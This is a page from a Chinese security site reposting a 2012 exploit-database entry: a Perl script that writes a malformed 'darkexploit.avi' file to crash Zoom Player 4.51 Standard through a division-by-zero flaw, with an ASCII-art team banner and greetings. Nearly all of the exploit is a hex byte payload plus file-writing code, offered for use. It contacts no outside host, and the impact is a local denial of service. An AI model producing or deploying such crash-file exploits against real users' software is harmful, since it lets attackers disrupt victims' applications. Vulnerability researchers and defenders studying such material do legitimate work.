首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Zoom Player 4.51 Standard - ".avi" Denial Of Service
来源:dark-puzzle[at]live[at]fr 作者:Dark-Puzzle 发布时间:2012-07-02  
#!/usr/bin/perl
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0      _                   __           __       __                      1
#1    /' \            __  /'__`\        /\ \__  /'__`\                    0
#0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
#1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
#0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
#1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
#0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
#1                   \ \____/ >> Exploit database separated by exploit    0
#0                    \/___/          type (local, remote, DoS, etc.)     1
#1                                                                        1
#0   [x] Official Website: http://www.1337day.com                         0
#1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   #                                                                         
#1               ==========================================               1
#0                   I'm Dark-Puzzle From Inj3ct0r TEAM                   0
#0                                                                        1
#1                       dark-puzzle[at]live[at]fr                        0
#0               ==========================================               1
#1                 Pentesting/exploit coding/bug research                 0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
#         [0day Exploits]  Allah , Alwatan , Almalik .[0day Exploits]
# Exploit Title: Zoom Player 4.51 Standard - Division By Zero Vulnerability .
# Author: Dark-Puzzle . 
# Danger : Medium .
# Category :Local Exploit .
# Version:  4.51 Standard
# Vendor :  http://www.inmatrix.com/
# Software Link : http://www.oldapps.com/download.php?oldappsid=zp451std.exe
# Date: 30 June 2012 .
#------------------------------------------------------------------------#
#                                                                        #
#                     Usage : perl zoom.pl                               #
#                                                                        #
#------------------------------------------------------------------------#

my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00 
\x9b\x0e\xf3\xf8\xdb\xa7\x3b\x6f\xc8\x16\x08\x7f\x88\xa2\xf9\xcb
\x87\xab\x7f\x17\xa9\x9f\xa1\xb9\x98\x8e\x2b\x87\xcb\xf9\xbe\x50 
\x42\x99\x11\x26\x5c\xb6\x79\x44\xec\xe2\xee\x71\xd0\x5b\x50\x4e 
\x37\x34\x3d\x55\xc8\x2c\x4f\x28\x9a\xea\xd0\xc7\x6d\xca\x47\xa2 
\x07\xda\x51\xb7\x97\xe6\x1c\xd5\xd8\x32\xf9\xb1\x04\xa7\x08\xb2 
\xe9\xfb\xb5\x1a\xb7\xa7\x7a\xa6\xf9\xf6\xc9\x93\x91\xa1\x21\x29 
\xa3\x1c\xe3\xc7\xcb\x17\xfd\x8d\x65\xfd\x81\x61\x6b\x89\xaf\x53 
\x31\x45\x0c\x71\xcb\x93\xcb\x6e\x2a\xcf\xa6\x76\x1a\xa8\xcc\xad 
\x81\xfd\xc4\x56\xa7\x82\xda\x3d\x20\x80\xff\x4c\xbe\xc0\x4c\x61
\x9e\x75\x4c\x71\xa2\x9d\xfd\x65\xcc\x59\x23\xe0\xeb\xae\x58\xa3 
\xe9\xff\x16\xfc\x08\x03\x36\x4a\x69\xbb\xc4\x19\x10\x1b\xc8\x2c 
\x9e\xd9\x56\xfe\x38\x32\xf7\xe5\x2c\xd8\xb4\x6c\x31\xcc\x15\x5c 
\x41\xda\x03\xde\x5c\x23\x2d\xda\x4f\x7b\x44\x07\x60\x24\xa7\x58 
\x65\xf7\xe9\xaa\xff\x02\x9d\x1f\x39\x76\x7e\x75\x43\xac\xe5\xc9 
\xd0\x43\x2e\x4c\xeb\x81\x26\xb5\xcf\x6d\xb9\xe9\xa0\xc7\x85\x4a 
\xce\x5f\xb4\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x06\x00\x00\x00\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xcb\x6e\x2a\xcf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 

# A division by zero exploit causing a DoS to the program ( neither you can't play nothing nor close the program ) . 
#  to close the Zoom player you have to use the Windows Task Manager .


my $file = "darkexploit.avi";

open ($File, ">$file");
print $File $h;
close ($File);

#------------------------------------------------------------------------------------------------------------------------
#Dark-Puzzle (Souhail) .
#\x90 
#Follow me : fb.me/dark.puzzle
#\x90 
#Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army
#\x90 
#Greetz to : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members , Packetstromsecurity.org , Ar-Devlopers....
#\x90 
#Pentesting is my LIFE .
#\x90 
#GREY HAT Mercy From M0rocC0 .

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PC Tools Firewall Plus 7.0.0.1
·python-wrapper untrusted searc
·Linux Kernel 2.6.18-374 Local
·Chrome Engine 4 Denial of Serv
·Apple QuickTime TeXML Stack Bu
·xArrow <= 3.2 multiple vulnera
·Symantec PcAnywhere 12.5.0 Log
·Novell GroupWise Messenger <=
·Real Player 10 GOLD - Exceptio
·Serv-U FTP <= 11.1.0.3 possibl
·Linux 3.x.x Executable File Re
·VisualTrader OpenVT lame Denia
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved